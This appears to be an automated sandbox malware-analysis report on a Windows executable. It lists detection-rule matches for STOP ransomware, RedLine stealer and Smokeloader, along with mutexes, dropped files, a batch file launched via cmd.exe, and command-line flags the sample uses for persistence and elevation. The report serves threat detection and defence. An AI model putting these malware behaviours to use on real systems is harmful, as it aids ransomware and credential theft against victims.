Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068190950.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.2068864914.0000000002ECB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2342341845.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2616958897.000000000494A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.2396309012.0000000002FC7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000029.00000002.3255503396.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000029.00000002.3254939244.0000000002F2E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.2445927456.0000000004995000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@38/296@18/11

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00411900

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Code function: 0_2_02ED2423 CreateToolhelp32Snapshot,Module32First,

0_2_02ED2423

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_0040D240

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\dejcbcc

Jump to behavior

Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1028
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\B88.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "

Source: unknown

Process created: C:\Windows\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --ForNetRes	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Task	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --AutoStart	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Service	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: X1P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: runas	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x2Q	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x*P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: C:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: D:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: 7P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: %username%	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: F:\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --ForNetRes	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Task	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --AutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Service	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: X1P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: runas	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x2Q	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x*P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: C:\Windows\	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: D:\Windows\	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: 7P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: %username%	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: F:\	14_2_00419F90

Source: XVM5nluelx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XVM5nluelx.exe

ReversingLabs: Detection: 31%

Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
